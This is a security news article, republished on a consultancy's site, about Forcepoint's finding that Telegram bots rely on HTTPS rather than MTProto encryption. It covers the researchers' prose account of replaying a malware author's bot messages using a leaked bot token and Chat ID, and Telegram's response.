fbpx
Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

Be Careful Using Bots On Telegram

Be Careful Using Bots On Telegram

The secure messaging app Telegram is significant for two very different reasons. One is that the app is a go-to encrypted communication tool for hundreds of millions of users around the world, particularly those looking to duck government surveillance and censorship in countries like Russia and Iran. The other is that many cryptography experts have cast doubt on the integrity of Telegram’s encryption scheme. A new report from the web security firm Forcepoint, about Telegram’s use of bots, has implications for both Telegram’s users and its critics.

Telegram bots are small programs that can embed in Telegram chats or public channels and perform a specific function. They can offer customized keyboards, produce cat memes on demand, or even accept payments and act as a digital storefront. Bots are popular on Telegram, because they’re fun and convenient, and Telegram has supported them since 2015. They are essentially automated Telegram accounts; you can just add them to chats and channels as you would a friend. But while researching the bot platform, Forcepoint realized that the feature doesn’t incorporate the encryption algorithm Telegram uses to protect its chats. As a result, adding a bot to a chat or channel undermines its security, potentially making it easier for a third party to intercept messages.

“This is something that affects you if you are operating a bot or are in a channel with bots,” says Luke Somerville, head of special investigations at Forcepoint. “I’ll be honest, it surprised us when we realized that the bot security is that different than how normal messaging works.”

Specifically, Telegram bots don’t use MTProto, Telegram’s encryption protocol, which creates the framework in which users’ messages to each other are scrambled and illegible while in transit between a sender and recipient’s devices. While researchers have raised various concerns about MTProto over the years—Telegram maintains it is sound—if you trust Telegram with your secure communications, you’re trusting MTProto.

But Telegram’s bot platform relies instead on the transport layer security protocol used in HTTPS web encryption. TLS is great for a lot of things but isn’t robust enough to act as the only encryption in a secure communication service meant to provide advanced protection. That’s why apps like Signal and WhatsApp use the Signal Protocol, and Telegram has MTProto. By building its bot platform without MTProto, though, Telegram creates a situation where introducing a bot to a chat or channel essentially downgrades its encryption.

Also Read: Data Storage Security Standards: What Storage Professionals Need To Know

Forcepoint made the discovery in an unexpected way. Security researchers have previously found Telegram bots that command and control malicious Android apps, and even exfiltrate data from Telegram chats through the Telegram bot API used by developers. Bots’ deep integration into the app make them a popular pawn in attack strategies. While researching one such malware scheme, Forcepoint accidentally discovered that Telegram chats that include bots have reduced security.

The researchers probed a sample of remote management malware dubbed GoodSender and identified the mechanism within the code that awaited commands from a Telegram bot. The malware included two pieces of Telegram identification and authentication information—called the bot API token and Chat ID—that are used to direct bots’ queries to the right chats. Armed with these details, the researchers realized that they could craft API requests that would essentially replay all the communications between the malware author and his bot. Because the hacker made the mistake of doing all of his testing and deployment in one bot setup (instead of covering his tracks by using multiple accounts), the researchers were able to study how he had set up, tested, and eventually started deploying the malware.

While the Forcepoint researchers used the Telegram API to snoop on the hacker’s bot communications as part of well-meaning defense analysis, they emphasize that someone else could use the same technique for ill and look back at a whole conversation a bot is present in. And even someone who doesn’t have a chat’s bot API token and Chat ID from a malware sample could still potentially extract them in other ways. Both pieces of information are embedded in every Telegram communication, so bots can know which data or service to send to which chat.

The idea that a secure messaging service’s own feature could downgrade its encryption scheme—without giving any visual cue to the user—is concerning. “You can create your own burner Telegram account and tell the bot to forward you these messages,” Somerville says. “It’s relatively trivial to do, and you can forward all the messages in that channel that the bot has had access to. You’ll be able to read all the messages they’ve exchanged.”

Forcepoint has been in touch with Telegram about the findings, but wouldn’t comment on its interactions with the company. “That bot traffic goes over HTTPS is not something to be ‘discovered’—it’s a documented property of the system,” Markus Ra, Telegram’s head of support, said in a statement. “This is an industry standard. Note that by default, Telegram bots only receive messages that are specifically meant for them.” Telegram also argues that grabbing the bot API token and Chat ID is akin to stealing someone’s password to an account—at that point an attacker would have full access anyway. The company did not offer an explanation for why bot communications are secured only with HTTPS and not MTProto.

Taking advantage of the lesser protection on Telegram chats and channels that include bots would still require an attacker to be able to decrypt HTTPS Telegram traffic. In Forcepoint’s case, the researchers got around it by essentially obtaining the keys to the kingdom in the malware sample they were working on. In general, a relatively sophisticated adversary would have to be targeting you to become a “man in the middle” of your HTTPS communication. But the reason secure communication platforms require more-advanced encryption in the first place is precisely that it can sometimes be possible to skirt HTTPS.

“In a situation where certain chats only use TLS because of bot functionality, a bot would dramatically undercut the security properties of a chat,” says Kenn White, director of the Open Crypto Audit Project. “Using a protocol that’s not part of the core protocol for a convenience integration would provide none of the integrity or benefit of that main protocol. That would be an intentional design trade-off that dramatically undermines security guarantees.”

To keep your Telegram communications safe, don’t add bots to your chats, and be aware when you’re in chats and channels that include them. And to keep messages really secret, always minimize the number of people in a chat to reduce exposure. Many cryptographers and security engineers, though, including White, say that the safest way to use Telegram is just not to use it at all. They doubt whether Telegram is fully end-to-end encrypted (a protection that isn’t on by default anyway) and worry that the custom MTProto protocol is difficult to fully vet. But for the app’s 200 million adherents, the security differences between chats that include bots and chats that don’t are important.

“For bot developers there’s not an awful lot they can do about this themselves other than warning people that the potential for this sort of attack exists,” Forcepoint’s Somerville says. “It’s unfortunate—it’s a design decision.”

Also Read: IT Governance Framework PDF Best Practices And Guidelines

Updated January 17, 2019, 8:50am ET and 11:50am ET to include comments from Telegram.

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us